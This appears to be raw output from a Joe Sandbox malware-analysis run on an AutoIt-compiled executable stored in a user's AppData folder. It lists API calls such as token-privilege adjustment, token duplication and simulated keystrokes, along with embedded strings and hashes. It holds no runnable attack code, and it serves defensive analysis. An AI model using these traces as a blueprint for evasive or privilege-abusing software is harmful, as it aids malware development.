                                                                                                                        • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 3714316930-3081909835
                                                                                                                        • Opcode ID: 38625206556e2786e2899561b9eba00bb1d5a1c6bd7b7f07c538fbaa3fc12662
                                                                                                                        • Instruction ID: 10b3e524b287f8c5ae6856dc4764ed074900e4c6c324d855f7d7d6b8f228cf42
                                                                                                                        • Opcode Fuzzy Hash: 38625206556e2786e2899561b9eba00bb1d5a1c6bd7b7f07c538fbaa3fc12662
                                                                                                                        • Instruction Fuzzy Hash: 9F117771A10298ABCF05DFA4D8456DEBBFDAF45705F00840AE901BB242DBB54A4D9BA1
                                                                                                                        APIs
                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E78E52: __NMSG_WRITE.LIBCMT ref: 00E78E79
                                                                                                                          • Part of subcall function 00E78E52: __NMSG_WRITE.LIBCMT ref: 00E78E83
                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E78EB2: GetModuleFileNameW.KERNEL32(00000000,00F10312,00000104,?,00000001,00E70127), ref: 00E78F44
                                                                                                                          • Part of subcall function 00E78EB2: ___crtMessageBoxW.LIBCMT ref: 00E78FF2
                                                                                                                          • Part of subcall function 00E71D65: ___crtCorExitProcess.LIBCMT ref: 00E71D6B
                                                                                                                          • Part of subcall function 00E71D65: ExitProcess.KERNEL32 ref: 00E71D74
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1372826849-0
                                                                                                                        • Opcode ID: 16c4e6d61c9da9f328fea20a451d23cff569620a58a17c670305930ebf887903
                                                                                                                        • Instruction ID: 9fd7f32cffc33b158f9aa58bf665067b6975014c60de0a3112858a1c92ddacd6
                                                                                                                        • Opcode Fuzzy Hash: 16c4e6d61c9da9f328fea20a451d23cff569620a58a17c670305930ebf887903
                                                                                                                        • Instruction Fuzzy Hash: 61012DB16453019AE6243B74AC11B7A3388EF82765F51F02AF60DFB1C1DFB09C40D661
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00E9C45E
                                                                                                                          • Part of subcall function 00E728CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728DE
                                                                                                                          • Part of subcall function 00E728CA: GetLastError.KERNEL32(00000000,?,00E78715,00000000,00E788A3,00E74673,?), ref: 00E728F0
                                                                                                                        • _free.LIBCMT ref: 00E9C46F
                                                                                                                        • _free.LIBCMT ref: 00E9C481
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 776569668-0
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CALL
                                                                                                                        • API String ID: 0-4196123274
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E516F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00E514EB), ref: 00E51751
                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E5159B
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00E51612
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00EC58F7
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3815369404-0
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: EA06
                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                        Strings
                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00EC34AA
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(00000000), ref: 00ECDB31
                                                                                                                        • IsWindow.USER32(00000000), ref: 00ECDB6B
                                                                                                                          • Part of subcall function 00E51F04: GetForegroundWindow.USER32 ref: 00E51FBE
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Foreground
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 62970417-0
                                                                                                                        APIs
                                                                                                                        • IsThemeActive.UXTHEME ref: 00E536E6
                                                                                                                          • Part of subcall function 00E72025: __lock.LIBCMT ref: 00E7202B
                                                                                                                          • Part of subcall function 00E532DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E532F6
                                                                                                                          • Part of subcall function 00E532DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E5330B
                                                                                                                          • Part of subcall function 00E5374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00E5376D
                                                                                                                          • Part of subcall function 00E5374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00E5377F
                                                                                                                          • Part of subcall function 00E5374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00000104,?,00F11120,C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe,00F11124,?,?), ref: 00E537EE
                                                                                                                          • Part of subcall function 00E5374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00E53860
                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E53726
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 924797094-0
                                                                                                                        APIs
                                                                                                                        • ___lock_fhandle.LIBCMT ref: 00E7F7D9
                                                                                                                        • __close_nolock.LIBCMT ref: 00E7F7F2
                                                                                                                          • Part of subcall function 00E7886A: __getptd_noexit.LIBCMT ref: 00E7886A
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1046115767-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E745EC: __FF_MSGBANNER.LIBCMT ref: 00E74603
                                                                                                                          • Part of subcall function 00E745EC: __NMSG_WRITE.LIBCMT ref: 00E7460A
                                                                                                                          • Part of subcall function 00E745EC: RtlAllocateHeap.NTDLL(01130000,00000000,00000001,?,?,?,?,00E70127,?,00E5125D,00000058,?,?), ref: 00E7462F
                                                                                                                        • std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E77495: RaiseException.KERNEL32(?,?,00E5125D,00F06598,?,?,?,00E70158,00E5125D,00F06598,?,00000001), ref: 00E774E6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3902256705-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __lock_file.LIBCMT ref: 00E742B9
                                                                                                                          • Part of subcall function 00E75A9F: __lock.LIBCMT ref: 00E75AC2
                                                                                                                        • __fclose_nolock.LIBCMT ref: 00E742C4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2800547568-0
                                                                                                                        APIs
                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00E71D6B
                                                                                                                          • Part of subcall function 00E71D33: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,P,?,?,00E71D70,00E70127,?,00E78A37,000000FF,0000001E,00F068C8,00000008,00E7899B,00E70127,00E70127), ref: 00E71D42
                                                                                                                          • Part of subcall function 00E71D33: GetProcAddress.KERNEL32(P,CorExitProcess), ref: 00E71D54
                                                                                                                        • ExitProcess.KERNEL32 ref: 00E71D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427264223-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E53F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00E53F90
                                                                                                                          • Part of subcall function 00E74129: __wfsopen.LIBCMT ref: 00E74134
                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00E534E2,?,00000001), ref: 00E53FCD
                                                                                                                          • Part of subcall function 00E53E78: FreeLibrary.KERNEL32(00000000), ref: 00E53EAB
                                                                                                                          • Part of subcall function 00E54010: _memmove.LIBCMT ref: 00E5405A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1396898556-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00E534E2,?,00000001), ref: 00E53E6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        APIs
                                                                                                                        • _doexit.LIBCMT ref: 00E7201B
                                                                                                                          • Part of subcall function 00E71EE2: __lock.LIBCMT ref: 00E71EF0
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock_doexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 368792745-0
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: __wfsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 197181222-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00EBF64E
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBF6AD
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBF6EA
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EBF711
                                                                                                                        • SendMessageW.USER32 ref: 00EBF737
                                                                                                                        • _wcsncpy.LIBCMT ref: 00EBF7A3
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00EBF7C4
                                                                                                                        • GetKeyState.USER32(00000009), ref: 00EBF7D1
                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EBF7E7
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00EBF7F1
                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EBF820
                                                                                                                        • SendMessageW.USER32 ref: 00EBF843
                                                                                                                        • SendMessageW.USER32(?,00001030,?,00EBDE69), ref: 00EBF940
                                                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00EBF956
                                                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EBF967
                                                                                                                        • SetCapture.USER32(?), ref: 00EBF970
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBF9D4
                                                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EBF9E0
                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00EBF9FA
                                                                                                                        • ReleaseCapture.USER32 ref: 00EBFA05
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBFA3A
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBFA47
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EBFAA9
                                                                                                                        • SendMessageW.USER32 ref: 00EBFAD3
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EBFB12
                                                                                                                        • SendMessageW.USER32 ref: 00EBFB3D
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EBFB55
                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EBFB60
                                                                                                                        • GetCursorPos.USER32(?), ref: 00EBFB81
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00EBFB8E
                                                                                                                        • GetParent.USER32(?), ref: 00EBFBAA
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EBFC10
                                                                                                                        • SendMessageW.USER32 ref: 00EBFC40
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBFC96
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EBFCC2
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EBFCEA
                                                                                                                        • SendMessageW.USER32 ref: 00EBFD0D
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00EBFD57
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EBFD87
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EBFE1C
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                        • String ID: @GUI_DRAGID$F
                                                                                                                        • API String ID: 2516578528-4164748364
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EBAFDB
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: %d/%02d/%02d
                                                                                                                        • API String ID: 3850602802-328681919
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00E6F796
                                                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC4388
                                                                                                                        • IsIconic.USER32(000000FF), ref: 00EC4391
                                                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00EC439E
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC43A8
                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EC43BE
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EC43C5
                                                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00EC43D1
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EC43E2
                                                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00EC43EA
                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EC43F2
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC43F5
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC440A
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4415
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC441F
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4424
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC442D
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4432
                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC443C
                                                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00EC4441
                                                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00EC4444
                                                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00EC446B
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                        • String ID: Shell_TrayWnd
                                                                                                                        • API String ID: 4125248594-2988720461
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00F122E8,?,00000000,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?), ref: 00E5BE8B
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00E53E2E,?,00000000,?,00EEDBF0,00000000,?,00000002), ref: 00E5BEA7
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E5BF19
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5BF31
                                                                                                                        • _wcscat.LIBCMT ref: 00E5BF46
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5BF56
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5C03E
                                                                                                                        • _wcscpy.LIBCMT ref: 00E5C1ED
                                                                                                                        • SetCurrentDirectoryW.KERNEL32 ref: 00E5C250
                                                                                                                          • Part of subcall function 00E7010A: std::exception::exception.LIBCMT ref: 00E7013E
                                                                                                                          • Part of subcall function 00E7010A: __CxxThrowException@8.LIBCMT ref: 00E70153
                                                                                                                          • Part of subcall function 00E5C320: _memmove.LIBCMT ref: 00E5C419
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                                                                                                        • API String ID: 2542276039-689609797
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8BF0F
                                                                                                                          • Part of subcall function 00E8BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E8BF3C
                                                                                                                          • Part of subcall function 00E8BEC3: GetLastError.KERNEL32 ref: 00E8BF49
                                                                                                                        • _memset.LIBCMT ref: 00E8BA34
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E8BA86
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E8BA97
